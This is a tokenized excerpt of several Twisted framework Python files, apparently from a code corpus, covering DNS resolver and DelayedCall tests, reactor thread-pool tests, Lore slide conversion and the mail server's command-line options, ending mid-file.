assertEqual ( resolvedTo , [ ip ] ) <EOL> reactor . _clock . advance ( timeout + <NUM_LIT:1> ) <EOL> self . assertEqual ( reactor . _clock . calls , [ ] ) <EOL> def test_failure ( self ) : <EOL> """<STR_LIT>""" <EOL> timeout = <NUM_LIT:30> <EOL> reactor = FakeReactor ( ) <EOL> self . addCleanup ( reactor . _stop ) <EOL> def fakeGetHostByName ( name ) : <EOL> raise IOError ( "<STR_LIT>" ) <EOL> self . patch ( socket , '<STR_LIT>' , fakeGetHostByName ) <EOL> failedWith = [ ] <EOL> resolver = ThreadedResolver ( reactor ) <EOL> d = resolver . getHostByName ( "<STR_LIT>" , ( timeout , ) ) <EOL> self . assertFailure ( d , DNSLookupError ) <EOL> d . addCallback ( failedWith . append ) <EOL> reactor . _runThreadCalls ( ) <EOL> self . assertEqual ( len ( failedWith ) , <NUM_LIT:1> ) <EOL> reactor . _clock . advance ( timeout + <NUM_LIT:1> ) <EOL> self . assertEqual ( reactor . _clock . calls , [ ] ) <EOL> def test_timeout ( self ) : <EOL> """<STR_LIT>""" <EOL> timeout = <NUM_LIT:10> <EOL> reactor = FakeReactor ( ) <EOL> self . addCleanup ( reactor . _stop ) <EOL> result = Queue ( ) <EOL> def fakeGetHostByName ( name ) : <EOL> raise result . get ( ) <EOL> self . patch ( socket , '<STR_LIT>' , fakeGetHostByName ) <EOL> failedWith = [ ] <EOL> resolver = ThreadedResolver ( reactor ) <EOL> d = resolver . getHostByName ( "<STR_LIT>" , ( timeout , ) ) <EOL> self . assertFailure ( d , DNSLookupError ) <EOL> d . addCallback ( failedWith . append ) <EOL> reactor . _clock . advance ( timeout - <NUM_LIT:1> ) <EOL> self . assertEqual ( failedWith , [ ] ) <EOL> reactor . _clock . advance ( <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( failedWith ) , <NUM_LIT:1> ) <EOL> result . 
put ( IOError ( "<STR_LIT>" ) ) <EOL> class DelayedCallTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def _getDelayedCallAt ( self , time ) : <EOL> """<STR_LIT>""" <EOL> def noop ( call ) : <EOL> pass <EOL> return DelayedCall ( time , lambda : None , ( ) , { } , noop , noop , None ) <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> self . zero = self . _getDelayedCallAt ( <NUM_LIT:0> ) <EOL> self . one = self . _getDelayedCallAt ( <NUM_LIT:1> ) <EOL> def test_str ( self ) : <EOL> """<STR_LIT>""" <EOL> def nothing ( ) : <EOL> pass <EOL> dc = DelayedCall ( <NUM_LIT:12> , nothing , ( <NUM_LIT:3> , ) , { "<STR_LIT:A>" : <NUM_LIT:5> } , None , None , lambda : <NUM_LIT> ) <EOL> ids = { dc : <NUM_LIT:200> } <EOL> def fakeID ( obj ) : <EOL> try : <EOL> return ids [ obj ] <EOL> except ( TypeError , KeyError ) : <EOL> return id ( obj ) <EOL> self . addCleanup ( setIDFunction , setIDFunction ( fakeID ) ) <EOL> self . assertEqual ( <EOL> str ( dc ) , <EOL> "<STR_LIT>" ) <EOL> def test_lt ( self ) : <EOL> """<STR_LIT>""" <EOL> zero , one = self . zero , self . one <EOL> self . assertTrue ( zero < one ) <EOL> self . assertFalse ( one < zero ) <EOL> self . assertFalse ( zero < zero ) <EOL> self . assertFalse ( one < one ) <EOL> def test_le ( self ) : <EOL> """<STR_LIT>""" <EOL> zero , one = self . zero , self . one <EOL> self . assertTrue ( zero <= one ) <EOL> self . assertFalse ( one <= zero ) <EOL> self . assertTrue ( zero <= zero ) <EOL> self . assertTrue ( one <= one ) <EOL> def test_gt ( self ) : <EOL> """<STR_LIT>""" <EOL> zero , one = self . zero , self . one <EOL> self . assertTrue ( one > zero ) <EOL> self . assertFalse ( zero > one ) <EOL> self . assertFalse ( zero > zero ) <EOL> self . assertFalse ( one > one ) <EOL> def test_ge ( self ) : <EOL> """<STR_LIT>""" <EOL> zero , one = self . zero , self . one <EOL> self . assertTrue ( one >= zero ) <EOL> self . assertFalse ( zero >= one ) <EOL> self . assertTrue ( zero >= zero ) <EOL> self . 
assertTrue ( one >= one ) <EOL> def test_eq ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertFalse ( self . zero == self . one ) <EOL> self . assertTrue ( self . zero == self . zero ) <EOL> self . assertTrue ( self . one == self . one ) <EOL> def test_ne ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertTrue ( self . zero != self . one ) <EOL> self . assertFalse ( self . zero != self . zero ) <EOL> self . assertFalse ( self . one != self . one ) </s>
<s> """<STR_LIT>""" <EOL> __metaclass__ = type <EOL> from weakref import ref <EOL> import gc , threading <EOL> from twisted . python . threadable import isInIOThread <EOL> from twisted . internet . test . reactormixins import ReactorBuilder <EOL> from twisted . python . threadpool import ThreadPool <EOL> from twisted . internet . interfaces import IReactorThreads <EOL> class ThreadTestsBuilder ( ReactorBuilder ) : <EOL> """<STR_LIT>""" <EOL> requiredInterfaces = ( IReactorThreads , ) <EOL> def test_getThreadPool ( self ) : <EOL> """<STR_LIT>""" <EOL> state = [ ] <EOL> reactor = self . buildReactor ( ) <EOL> pool = reactor . getThreadPool ( ) <EOL> self . assertIsInstance ( pool , ThreadPool ) <EOL> self . assertFalse ( <EOL> pool . started , "<STR_LIT>" ) <EOL> def f ( ) : <EOL> state . append ( pool . started ) <EOL> state . append ( pool . joined ) <EOL> reactor . stop ( ) <EOL> reactor . callWhenRunning ( f ) <EOL> self . runReactor ( reactor , <NUM_LIT:2> ) <EOL> self . assertTrue ( <EOL> state [ <NUM_LIT:0> ] , "<STR_LIT>" ) <EOL> self . assertFalse ( <EOL> state [ <NUM_LIT:1> ] , "<STR_LIT>" ) <EOL> self . assertTrue ( <EOL> pool . joined , <EOL> "<STR_LIT>" ) <EOL> def test_suggestThreadPoolSize ( self ) : <EOL> """<STR_LIT>""" <EOL> reactor = self . buildReactor ( ) <EOL> reactor . suggestThreadPoolSize ( <NUM_LIT> ) <EOL> pool = reactor . getThreadPool ( ) <EOL> self . assertEqual ( pool . max , <NUM_LIT> ) <EOL> def test_delayedCallFromThread ( self ) : <EOL> """<STR_LIT>""" <EOL> reactor = self . buildReactor ( ) <EOL> def threadCall ( ) : <EOL> reactor . stop ( ) <EOL> reactor . callLater ( <NUM_LIT:0> , reactor . callFromThread , threadCall ) <EOL> before = reactor . seconds ( ) <EOL> self . runReactor ( reactor , <NUM_LIT> ) <EOL> after = reactor . seconds ( ) <EOL> self . assertTrue ( after - before < <NUM_LIT:30> ) <EOL> def test_callFromThread ( self ) : <EOL> """<STR_LIT>""" <EOL> reactor = self . 
buildReactor ( ) <EOL> result = [ ] <EOL> def threadCall ( ) : <EOL> result . append ( threading . currentThread ( ) ) <EOL> reactor . stop ( ) <EOL> reactor . callLater ( <NUM_LIT:0> , reactor . callInThread , <EOL> reactor . callFromThread , threadCall ) <EOL> self . runReactor ( reactor , <NUM_LIT:5> ) <EOL> self . assertEquals ( result , [ threading . currentThread ( ) ] ) <EOL> def test_stopThreadPool ( self ) : <EOL> """<STR_LIT>""" <EOL> reactor = self . buildReactor ( ) <EOL> threadpool = ref ( reactor . getThreadPool ( ) ) <EOL> reactor . callWhenRunning ( reactor . stop ) <EOL> self . runReactor ( reactor ) <EOL> gc . collect ( ) <EOL> self . assertIdentical ( threadpool ( ) , None ) <EOL> def test_stopThreadPoolWhenStartedAfterReactorRan ( self ) : <EOL> """<STR_LIT>""" <EOL> reactor = self . buildReactor ( ) <EOL> threadPoolRefs = [ ] <EOL> def acquireThreadPool ( ) : <EOL> threadPoolRefs . append ( ref ( reactor . getThreadPool ( ) ) ) <EOL> reactor . stop ( ) <EOL> reactor . callWhenRunning ( acquireThreadPool ) <EOL> self . runReactor ( reactor ) <EOL> gc . collect ( ) <EOL> self . assertIdentical ( threadPoolRefs [ <NUM_LIT:0> ] ( ) , None ) <EOL> def test_cleanUpThreadPoolEvenBeforeReactorIsRun ( self ) : <EOL> """<STR_LIT>""" <EOL> reactor = self . buildReactor ( ) <EOL> threadPoolRef = ref ( reactor . getThreadPool ( ) ) <EOL> reactor . fireSystemEvent ( "<STR_LIT>" ) <EOL> gc . collect ( ) <EOL> self . assertIdentical ( threadPoolRef ( ) , None ) <EOL> def test_isInIOThread ( self ) : <EOL> """<STR_LIT>""" <EOL> results = [ ] <EOL> reactor = self . buildReactor ( ) <EOL> def check ( ) : <EOL> results . append ( isInIOThread ( ) ) <EOL> reactor . stop ( ) <EOL> reactor . callWhenRunning ( check ) <EOL> self . runReactor ( reactor ) <EOL> self . assertEqual ( [ True ] , results ) <EOL> def test_isNotInIOThread ( self ) : <EOL> """<STR_LIT>""" <EOL> results = [ ] <EOL> reactor = self . buildReactor ( ) <EOL> def check ( ) : <EOL> results . 
append ( isInIOThread ( ) ) <EOL> reactor . callFromThread ( reactor . stop ) <EOL> reactor . callInThread ( check ) <EOL> self . runReactor ( reactor ) <EOL> self . assertEqual ( [ False ] , results ) <EOL> globals ( ) . update ( ThreadTestsBuilder . makeTestCaseClasses ( ) ) </s>
<s> """<STR_LIT>""" <EOL> from xml . dom import minidom as dom <EOL> import os . path , re <EOL> from cStringIO import StringIO <EOL> from twisted . lore import default <EOL> from twisted . web import domhelpers <EOL> from twisted . python import text <EOL> from twisted . lore . latex import BaseLatexSpitter , LatexSpitter , processFile <EOL> from twisted . lore . latex import getLatexText , HeadingLatexSpitter <EOL> from twisted . lore . tree import getHeaders <EOL> from twisted . lore . tree import removeH1 , fixAPI , fontifyPython <EOL> from twisted . lore . tree import addPyListings , addHTMLListings , setTitle <EOL> hacked_entities = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> entities = { '<STR_LIT>' : '<STR_LIT:&>' , '<STR_LIT>' : '<STR_LIT:>>' , '<STR_LIT>' : '<STR_LIT:<>' , '<STR_LIT>' : '<STR_LIT:">' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> class MagicpointOutput ( BaseLatexSpitter ) : <EOL> bulletDepth = <NUM_LIT:0> <EOL> def writeNodeData ( self , node ) : <EOL> buf = StringIO ( ) <EOL> getLatexText ( node , buf . write , entities = hacked_entities ) <EOL> data = buf . getvalue ( ) . rstrip ( ) . replace ( '<STR_LIT:\n>' , '<STR_LIT:U+0020>' ) <EOL> self . writer ( re . sub ( '<STR_LIT>' , '<STR_LIT:U+0020>' , data ) ) <EOL> def visitNode_title ( self , node ) : <EOL> self . title = domhelpers . getNodeText ( node ) <EOL> def visitNode_body ( self , node ) : <EOL> self . fontStack = [ ( '<STR_LIT>' , None ) ] <EOL> self . writer ( self . start_h2 ) <EOL> self . writer ( self . title ) <EOL> self . writer ( self . end_h2 ) <EOL> self . writer ( '<STR_LIT>' ) <EOL> for authorNode in domhelpers . findElementsWithAttribute ( node , '<STR_LIT:class>' , '<STR_LIT>' ) : <EOL> getLatexText ( authorNode , self . writer , entities = entities ) <EOL> self . writer ( '<STR_LIT:\n>' ) <EOL> self . writer ( self . start_h2 ) <EOL> self . writer ( self . 
title ) <EOL> self . writer ( self . end_h2 ) <EOL> for element in getHeaders ( node ) : <EOL> level = int ( element . tagName [ <NUM_LIT:1> ] ) - <NUM_LIT:1> <EOL> self . writer ( level * '<STR_LIT:\t>' ) <EOL> self . writer ( domhelpers . getNodeText ( element ) ) <EOL> self . writer ( '<STR_LIT:\n>' ) <EOL> self . visitNodeDefault ( node ) <EOL> def visitNode_div_author ( self , node ) : <EOL> pass <EOL> def visitNode_div_pause ( self , node ) : <EOL> self . writer ( '<STR_LIT>' ) <EOL> def visitNode_pre ( self , node ) : <EOL> buf = StringIO ( ) <EOL> getLatexText ( node , buf . write , entities = entities ) <EOL> data = buf . getvalue ( ) <EOL> data = text . removeLeadingTrailingBlanks ( data ) <EOL> lines = data . split ( '<STR_LIT:\n>' ) <EOL> self . fontStack . append ( ( '<STR_LIT>' , <NUM_LIT:4> ) ) <EOL> self . writer ( '<STR_LIT:%>' + self . fontName ( ) + '<STR_LIT:\n>' ) <EOL> for line in lines : <EOL> self . writer ( '<STR_LIT:U+0020>' + line + '<STR_LIT:\n>' ) <EOL> del self . fontStack [ - <NUM_LIT:1> ] <EOL> self . writer ( '<STR_LIT:%>' + self . fontName ( ) + '<STR_LIT:\n>' ) <EOL> def visitNode_ul ( self , node ) : <EOL> if self . bulletDepth > <NUM_LIT:0> : <EOL> self . writer ( self . _start_ul ) <EOL> self . bulletDepth += <NUM_LIT:1> <EOL> self . start_li = self . _start_li * self . bulletDepth <EOL> self . visitNodeDefault ( node ) <EOL> self . bulletDepth -= <NUM_LIT:1> <EOL> self . start_li = self . _start_li * self . bulletDepth <EOL> def visitNode_strong ( self , node ) : <EOL> self . doFont ( node , '<STR_LIT>' ) <EOL> def visitNode_em ( self , node ) : <EOL> self . doFont ( node , '<STR_LIT>' ) <EOL> def visitNode_code ( self , node ) : <EOL> self . doFont ( node , '<STR_LIT>' ) <EOL> def doFont ( self , node , style ) : <EOL> self . fontStack . append ( ( style , None ) ) <EOL> self . writer ( '<STR_LIT>' + self . fontName ( ) + '<STR_LIT:\n>' ) <EOL> self . visitNodeDefault ( node ) <EOL> del self . 
fontStack [ - <NUM_LIT:1> ] <EOL> self . writer ( '<STR_LIT>' + self . fontName ( ) + '<STR_LIT:\n>' ) <EOL> def fontName ( self ) : <EOL> names = [ x [ <NUM_LIT:0> ] for x in self . fontStack ] <EOL> if '<STR_LIT>' in names : <EOL> name = '<STR_LIT>' <EOL> else : <EOL> name = '<STR_LIT>' <EOL> if '<STR_LIT>' in names : <EOL> name += '<STR_LIT>' <EOL> if '<STR_LIT>' in names : <EOL> name += '<STR_LIT>' <EOL> if name == '<STR_LIT>' : <EOL> name = '<STR_LIT>' <EOL> sizes = [ x [ <NUM_LIT:1> ] for x in self . fontStack ] <EOL> sizes . reverse ( ) <EOL> for size in sizes : <EOL> if size : <EOL> return '<STR_LIT>' % ( name , size ) <EOL> return '<STR_LIT>' % name <EOL> start_h2 = "<STR_LIT>" <EOL> end_h2 = '<STR_LIT>' <EOL> _start_ul = '<STR_LIT:\n>' <EOL> _start_li = "<STR_LIT:\t>" <EOL> end_li = "<STR_LIT:\n>" <EOL> def convertFile ( filename , outputter , template , ext = "<STR_LIT>" ) : <EOL> fout = open ( os . path . splitext ( filename ) [ <NUM_LIT:0> ] + ext , '<STR_LIT:w>' ) <EOL> fout . write ( open ( template ) . read ( ) ) <EOL> spitter = outputter ( fout . write , os . path . dirname ( filename ) , filename ) <EOL> fin = open ( filename ) <EOL> processFile ( spitter , fin ) <EOL> fin . close ( ) <EOL> fout . close ( ) <EOL> def splitIntoSlides ( document ) : <EOL> body = domhelpers . findNodesNamed ( document , '<STR_LIT:body>' ) [ <NUM_LIT:0> ] <EOL> slides = [ ] <EOL> slide = [ ] <EOL> title = '<STR_LIT>' <EOL> for child in body . childNodes : <EOL> if isinstance ( child , dom . Element ) and child . tagName == '<STR_LIT>' : <EOL> if slide : <EOL> slides . append ( ( title , slide ) ) <EOL> slide = [ ] <EOL> title = domhelpers . getNodeText ( child ) <EOL> else : <EOL> slide . append ( child ) <EOL> slides . 
append ( ( title , slide ) ) <EOL> return slides <EOL> def insertPrevNextLinks ( slides , filename , ext ) : <EOL> for slide in slides : <EOL> for name , offset in ( ( "<STR_LIT>" , - <NUM_LIT:1> ) , ( "<STR_LIT>" , + <NUM_LIT:1> ) ) : <EOL> if ( slide . pos > <NUM_LIT:0> and name == "<STR_LIT>" ) or ( slide . pos < len ( slides ) - <NUM_LIT:1> and name == "<STR_LIT>" ) : <EOL> for node in domhelpers . findElementsWithAttribute ( slide . dom , "<STR_LIT:class>" , name ) : <EOL> if node . tagName == '<STR_LIT:a>' : <EOL> node . setAttribute ( '<STR_LIT>' , '<STR_LIT>' <EOL> % ( filename [ <NUM_LIT:0> ] , slide . pos + offset , ext ) ) <EOL> else : <EOL> text = dom . Text ( ) <EOL> text . data = slides [ slide . pos + offset ] . title <EOL> node . appendChild ( text ) <EOL> else : <EOL> for node in domhelpers . findElementsWithAttribute ( slide . dom , "<STR_LIT:class>" , name ) : <EOL> pos = <NUM_LIT:0> <EOL> for child in node . parentNode . childNodes : <EOL> if child is node : <EOL> del node . parentNode . childNodes [ pos ] <EOL> break <EOL> pos += <NUM_LIT:1> <EOL> class HTMLSlide : <EOL> def __init__ ( self , dom , title , pos ) : <EOL> self . dom = dom <EOL> self . title = title <EOL> self . pos = pos <EOL> def munge ( document , template , linkrel , d , fullpath , ext , url , config ) : <EOL> removeH1 ( document ) <EOL> fixAPI ( document , url ) <EOL> fontifyPython ( document ) <EOL> addPyListings ( document , d ) <EOL> addHTMLListings ( document , d ) <EOL> template = template . cloneNode ( <NUM_LIT:1> ) <EOL> slides = [ ] <EOL> pos = <NUM_LIT:0> <EOL> for title , slide in splitIntoSlides ( document ) : <EOL> t = template . cloneNode ( <NUM_LIT:1> ) <EOL> text = dom . Text ( ) <EOL> text . data = title <EOL> setTitle ( t , [ text ] ) <EOL> tmplbody = domhelpers . findElementsWithAttribute ( t , "<STR_LIT:class>" , "<STR_LIT:body>" ) [ <NUM_LIT:0> ] <EOL> tmplbody . childNodes = slide <EOL> tmplbody . 
setAttribute ( "<STR_LIT:class>" , "<STR_LIT:content>" ) <EOL> slides . append ( HTMLSlide ( t , title , pos ) ) <EOL> pos += <NUM_LIT:1> <EOL> insertPrevNextLinks ( slides , os . path . splitext ( os . path . basename ( fullpath ) ) , ext ) <EOL> return slides <EOL> from tree import makeSureDirectoryExists <EOL> def getOutputFileName ( originalFileName , outputExtension , index ) : <EOL> return os . path . splitext ( originalFileName ) [ <NUM_LIT:0> ] + '<STR_LIT:->' + str ( index ) + outputExtension <EOL> def doFile ( filename , linkrel , ext , url , templ , options = { } , outfileGenerator = getOutputFileName ) : <EOL> from tree import parseFileAndReport <EOL> doc = parseFileAndReport ( filename ) <EOL> slides = munge ( doc , templ , linkrel , os . path . dirname ( filename ) , filename , ext , url , options ) <EOL> for slide , index in zip ( slides , range ( len ( slides ) ) ) : <EOL> newFilename = outfileGenerator ( filename , ext , index ) <EOL> makeSureDirectoryExists ( newFilename ) <EOL> f = open ( newFilename , '<STR_LIT:wb>' ) <EOL> slide . dom . writexml ( f ) <EOL> f . close ( ) <EOL> class ProsperSlides ( LatexSpitter ) : <EOL> firstSlide = <NUM_LIT:1> <EOL> start_html = '<STR_LIT>' <EOL> start_body = '<STR_LIT>' <EOL> start_div_author = '<STR_LIT>' <EOL> end_div_author = '<STR_LIT:}>' <EOL> def visitNode_h2 ( self , node ) : <EOL> if self . firstSlide : <EOL> self . firstSlide = <NUM_LIT:0> <EOL> self . end_body = '<STR_LIT>' + self . end_body <EOL> else : <EOL> self . writer ( '<STR_LIT>' ) <EOL> self . writer ( '<STR_LIT>' ) <EOL> spitter = HeadingLatexSpitter ( self . writer , self . currDir , self . filename ) <EOL> spitter . visitNodeDefault ( node ) <EOL> self . writer ( '<STR_LIT:}>' ) <EOL> def _write_img ( self , target ) : <EOL> self . 
writer ( '<STR_LIT>' <EOL> '<STR_LIT>' % target ) <EOL> class PagebreakLatex ( LatexSpitter ) : <EOL> everyN = <NUM_LIT:1> <EOL> currentN = <NUM_LIT:0> <EOL> seenH2 = <NUM_LIT:0> <EOL> start_html = LatexSpitter . start_html + "<STR_LIT>" <EOL> start_body = '<STR_LIT>' <EOL> def visitNode_h2 ( self , node ) : <EOL> if not self . seenH2 : <EOL> self . currentN = <NUM_LIT:0> <EOL> self . seenH2 = <NUM_LIT:1> <EOL> else : <EOL> self . currentN += <NUM_LIT:1> <EOL> self . currentN %= self . everyN <EOL> if not self . currentN : <EOL> self . writer ( '<STR_LIT>' ) <EOL> level = ( int ( node . tagName [ <NUM_LIT:1> ] ) - <NUM_LIT:2> ) + self . baseLevel <EOL> self . writer ( '<STR_LIT>' + level * '<STR_LIT>' + '<STR_LIT>' ) <EOL> spitter = HeadingLatexSpitter ( self . writer , self . currDir , self . filename ) <EOL> spitter . visitNodeDefault ( node ) <EOL> self . writer ( '<STR_LIT>' ) <EOL> class TwoPagebreakLatex ( PagebreakLatex ) : <EOL> everyN = <NUM_LIT:2> <EOL> class SlidesProcessingFunctionFactory ( default . ProcessingFunctionFactory ) : <EOL> latexSpitters = default . ProcessingFunctionFactory . latexSpitters . copy ( ) <EOL> latexSpitters [ '<STR_LIT>' ] = ProsperSlides <EOL> latexSpitters [ '<STR_LIT>' ] = PagebreakLatex <EOL> latexSpitters [ '<STR_LIT>' ] = TwoPagebreakLatex <EOL> def getDoFile ( self ) : <EOL> return doFile <EOL> def generate_mgp ( self , d , fileNameGenerator = None ) : <EOL> template = d . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> df = lambda file , linkrel : convertFile ( file , MagicpointOutput , template , ext = "<STR_LIT>" ) <EOL> return df <EOL> factory = SlidesProcessingFunctionFactory ( ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import warnings <EOL> from twisted . mail import mail <EOL> from twisted . mail import maildir <EOL> from twisted . mail import relay <EOL> from twisted . mail import relaymanager <EOL> from twisted . mail import alias <EOL> from twisted . internet import endpoints <EOL> from twisted . python import usage <EOL> from twisted . cred import checkers <EOL> from twisted . cred import strcred <EOL> from twisted . application import internet <EOL> class Options ( usage . Options , strcred . AuthOptionMixin ) : <EOL> synopsis = "<STR_LIT>" <EOL> optParameters = [ <EOL> [ "<STR_LIT>" , "<STR_LIT:S>" , <NUM_LIT:0> , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ] , <EOL> [ "<STR_LIT>" , "<STR_LIT:c>" , None , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ] , <EOL> [ "<STR_LIT>" , "<STR_LIT:R>" , None , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ] , <EOL> [ "<STR_LIT>" , "<STR_LIT:H>" , None , <EOL> "<STR_LIT>" ] , <EOL> ] <EOL> optFlags = [ <EOL> [ "<STR_LIT>" , "<STR_LIT:E>" , "<STR_LIT>" ] , <EOL> [ "<STR_LIT>" , None , <EOL> "<STR_LIT>" ] , <EOL> [ "<STR_LIT>" , None , "<STR_LIT>" ] , <EOL> [ "<STR_LIT>" , None , "<STR_LIT>" ] , <EOL> ] <EOL> _protoDefaults = { <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> } <EOL> compData = usage . Completions ( <EOL> optActions = { "<STR_LIT>" : usage . CompleteHostnames ( ) , <EOL> "<STR_LIT>" : usage . CompleteFiles ( "<STR_LIT>" ) } <EOL> ) <EOL> longdesc = "<STR_LIT>" <EOL> def __init__ ( self ) : <EOL> usage . Options . __init__ ( self ) <EOL> self . service = mail . MailService ( ) <EOL> self . last_domain = None <EOL> for service in self . _protoDefaults : <EOL> self [ service ] = [ ] <EOL> def addEndpoint ( self , service , description , certificate = None ) : <EOL> """<STR_LIT>""" <EOL> self [ service ] . append ( <EOL> _toEndpoint ( description , certificate = certificate ) ) <EOL> def opt_pop3 ( self , description ) : <EOL> """<STR_LIT>""" <EOL> self . 
addEndpoint ( '<STR_LIT>' , description ) <EOL> opt_p = opt_pop3 <EOL> def opt_smtp ( self , description ) : <EOL> """<STR_LIT>""" <EOL> self . addEndpoint ( '<STR_LIT>' , description ) <EOL> opt_s = opt_smtp <EOL> def opt_default ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . last_domain : <EOL> self . service . addDomain ( '<STR_LIT>' , self . last_domain ) <EOL> else : <EOL> raise usage . UsageError ( "<STR_LIT>" ) <EOL> opt_D = opt_default <EOL> def opt_maildirdbmdomain ( self , domain ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> name , path = domain . split ( '<STR_LIT:=>' ) <EOL> except ValueError : <EOL> raise usage . UsageError ( "<STR_LIT>" ) <EOL> self . last_domain = maildir . MaildirDirdbmDomain ( self . service , os . path . abspath ( path ) ) <EOL> self . service . addDomain ( name , self . last_domain ) <EOL> opt_d = opt_maildirdbmdomain <EOL> def opt_user ( self , user_pass ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> user , password = user_pass . split ( '<STR_LIT:=>' , <NUM_LIT:1> ) <EOL> except ValueError : <EOL> raise usage . UsageError ( "<STR_LIT>" ) <EOL> if self . last_domain : <EOL> self . last_domain . addUser ( user , password ) <EOL> else : <EOL> raise usage . UsageError ( "<STR_LIT>" ) <EOL> opt_u = opt_user <EOL> def opt_bounce_to_postmaster ( self ) : <EOL> """<STR_LIT>""" <EOL> self . last_domain . postmaster = <NUM_LIT:1> <EOL> opt_b = opt_bounce_to_postmaster <EOL> def opt_aliases ( self , filename ) : <EOL> """<STR_LIT>""" <EOL> if self . last_domain is not None : <EOL> if mail . IAliasableDomain . providedBy ( self . last_domain ) : <EOL> aliases = alias . loadAliasFile ( self . service . domains , filename ) <EOL> self . last_domain . setAliasGroup ( aliases ) <EOL> self . service . monitor . monitorFile ( <EOL> filename , <EOL> AliasUpdater ( self . service . domains , self . last_domain ) <EOL> ) <EOL> else : <EOL> raise usage . UsageError ( <EOL> "<STR_LIT>" % ( <EOL> self . last_domain . __class__ . 
__name__ , <EOL> ) <EOL> ) <EOL> else : <EOL> raise usage . UsageError ( "<STR_LIT>" ) <EOL> opt_A = opt_aliases <EOL> def _getEndpoints ( self , reactor , service ) : <EOL> """<STR_LIT>""" <EOL> if service == '<STR_LIT>' and self [ '<STR_LIT>' ] and len ( self [ service ] ) == <NUM_LIT:1> : <EOL> return self [ service ] + [ <EOL> endpoints . TCP4ServerEndpoint ( <EOL> reactor , self . _protoDefaults [ service ] ) ] <EOL> elif self [ service ] : <EOL> return self [ service ] <EOL> elif self [ '<STR_LIT>' + service ] : <EOL> return [ ] <EOL> else : <EOL> return [ <EOL> endpoints . TCP4ServerEndpoint ( <EOL> reactor , self . _protoDefaults [ service ] ) ] <EOL> def postOptions ( self ) : <EOL> from twisted . internet import reactor <EOL> if self [ '<STR_LIT>' ] : <EOL> if not self [ '<STR_LIT>' ] : <EOL> raise usage . UsageError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> elif not os . path . exists ( self [ '<STR_LIT>' ] ) : <EOL> raise usage . UsageError ( "<STR_LIT>" <EOL> % self [ '<STR_LIT>' ] ) <EOL> else : <EOL> self . addEndpoint ( <EOL> '<STR_LIT>' , self [ '<STR_LIT>' ] , certificate = self [ '<STR_LIT>' ] ) <EOL> if self [ '<STR_LIT>' ] and self [ '<STR_LIT>' ] is None : <EOL> raise usage . UsageError ( "<STR_LIT>" ) <EOL> if '<STR_LIT>' in self : <EOL> for ch in self [ '<STR_LIT>' ] : <EOL> self . service . smtpPortal . registerChecker ( ch ) <EOL> if not self [ '<STR_LIT>' ] : <EOL> self . service . smtpPortal . registerChecker ( checkers . AllowAnonymousAccess ( ) ) <EOL> anything = False <EOL> for service in self . _protoDefaults : <EOL> self [ service ] = self . _getEndpoints ( reactor , service ) <EOL> if self [ service ] : <EOL> anything = True <EOL> if not anything : <EOL> raise usage . UsageError ( "<STR_LIT>" ) <EOL> class AliasUpdater : <EOL> def __init__ ( self , domains , domain ) : <EOL> self . domains = domains <EOL> self . domain = domain <EOL> def __call__ ( self , new ) : <EOL> self . domain . setAliasGroup ( alias . loadAliasFile ( self . 
domains , new ) ) <EOL> def _toEndpoint ( description , certificate = None ) : <EOL> """<STR_LIT>""" <EOL> from twisted . internet import reactor <EOL> try : <EOL> port = int ( description ) <EOL> except ValueError : <EOL> return endpoints . serverFromString ( reactor , description ) <EOL> warnings . warn ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> category = DeprecationWarning , stacklevel = <NUM_LIT:3> ) <EOL> if certificate : <EOL> from twisted . internet . ssl import DefaultOpenSSLContextFactory <EOL> ctx = DefaultOpenSSLContextFactory ( certificate , certificate ) <EOL> return endpoints . SSL4ServerEndpoint ( reactor , port , ctx ) <EOL> return endpoints . TCP4ServerEndpoint ( reactor , port ) <EOL> def makeService ( config ) : <EOL> """<STR_LIT>""" <EOL> if config [ '<STR_LIT>' ] : <EOL> rmType = relaymanager . SmartHostESMTPRelayingManager <EOL> smtpFactory = config . service . getESMTPFactory <EOL> else : <EOL> rmType = relaymanager . SmartHostSMTPRelayingManager <EOL> smtpFactory = config . service . getSMTPFactory <EOL> if config [ '<STR_LIT>' ] : <EOL> dir = config [ '<STR_LIT>' ] <EOL> if not os . path . isdir ( dir ) : <EOL> os . mkdir ( dir ) <EOL> config . service . setQueue ( relaymanager . Queue ( dir ) ) <EOL> default = relay . DomainQueuer ( config . service ) <EOL> manager = rmType ( config . service . queue ) <EOL> if config [ '<STR_LIT>' ] : <EOL> manager . fArgs += ( None , None ) <EOL> manager . fArgs += ( config [ '<STR_LIT>' ] , ) <EOL> helper = relaymanager . RelayStateHelper ( manager , <NUM_LIT:1> ) <EOL> helper . setServiceParent ( config . service ) <EOL> config . service . domains . setDefaultDomain ( default ) <EOL> if config [ '<STR_LIT>' ] : <EOL> f = config . service . getPOP3Factory ( ) <EOL> for endpoint in config [ '<STR_LIT>' ] : <EOL> svc = internet . StreamServerEndpointService ( endpoint , f ) <EOL> svc . setServiceParent ( config . 
